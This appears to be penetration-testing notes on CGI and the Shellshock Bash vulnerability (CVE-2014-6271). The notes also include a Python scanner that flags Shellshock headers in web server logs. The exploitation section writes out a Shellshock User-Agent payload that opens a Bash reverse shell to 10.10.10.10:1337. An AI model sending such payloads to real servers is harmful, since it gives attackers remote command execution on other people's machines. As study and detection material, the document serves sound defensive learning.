Common Gateway Interface

The Common Gateway Interface (CGI) is a standard protocol used for web servers to execute external programs and generate dynamic web content. It acts as a bridge between the web server and applications written in languages such as Perl, Python, Bash, or C.

How CGI Works:
  1. A user requests a webpage that triggers a CGI script (e.g., http://rezydev.xyz/cgi-bin/script.py).
  2. The web server executes the script and provides it with input parameters (e.g., form data).
  3. The script processes the input, performs necessary operations (e.g., querying a database), and generates output.
  4. The output (usually in HTML format) is sent back to the web server, which delivers it to the user’s browser.

Scripts are commonly stored under the /cgi-bin/ endpoint.


Shellshock

Shellshock (CVE-2014-6271 and related CVEs) is a critical security vulnerability in GNU Bash (Bourne Again Shell) that allows an attacker to execute arbitrary commands on a vulnerable system. The flaw occurs because Bash improperly processes environment variables, enabling attackers to inject and execute malicious commands.

Shellshock becomes extremely dangerous when exploited through CGI scripts on web servers. Many web servers use Bash scripts to process user input via CGI, making them susceptible if they pass untrusted input to Bash.


Enumeration & Exploitation

  • Hunt for files like http://rezydev.xyz/cgi-bin/script.cgi using fuzzing methods.
  • After we find the script, we can try adding a Shellshock payload in the User-Agent header.
### User-Agent: () { :; }; PAYLOAD-HERE
User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.10.10/1337 0>&1 # rev-shell
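From the defender's side, the header trick above is easy to spot in web server logs: CGI exports User-Agent and Referer into the environment, so the Bash function-definition prefix shows up verbatim in the access log. The following Python is an added example (not part of these notes) that scans constructed Apache combined-format log lines for that prefix; the log lines, addresses and payload strings are all made up for the demonstration.

```python
import re
from typing import Dict, List, Optional

# Pre-patch Bash treated any environment variable whose value started with
# "() {" as a function definition and executed the text after the closing
# brace. A CGI server exports request headers such as User-Agent and Referer
# into the environment (HTTP_USER_AGENT, HTTP_REFERER), which is how the
# string reaches Bash, so that prefix is the signature to alert on.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{.*?\}\s*;")

# Apache "combined" log format: ... "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines for demonstration; not captured from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2024:13:55:36 +0000] "GET /cgi-bin/script.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2024:13:55:40 +0000] "GET /cgi-bin/script.cgi HTTP/1.1" 200 88 "-" "() { :; }; echo vulnerable"',
    '203.0.113.9 - - [10/Oct/2024:13:55:41 +0000] "GET /index.html HTTP/1.1" 200 1024 "() { :;}; echo x" "curl/7.68.0"',
]


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into its fields; None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_shellshock(lines: List[str]) -> List[Dict[str, object]]:
    """Return one finding per request header carrying the Shellshock prefix.

    'cgi' marks requests aimed at /cgi-bin/, where a Bash-backed script would
    actually receive the header as an environment variable; hits elsewhere are
    still worth logging as scanning activity.
    """
    findings: List[Dict[str, object]] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for field, header in (("ua", "User-Agent"), ("referer", "Referer")):
            if SHELLSHOCK_RE.search(rec[field]):
                findings.append({
                    "ip": rec["ip"],
                    "path": rec["path"],
                    "header": header,
                    "cgi": rec["path"].startswith("/cgi-bin/"),
                })
    return findings
```

Running `find_shellshock(SAMPLE_LOG)` flags the second and third lines, one via User-Agent against a /cgi-bin/ path and one via Referer against a static page.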

Apache Tomcat CGI

tomcat-cgi.md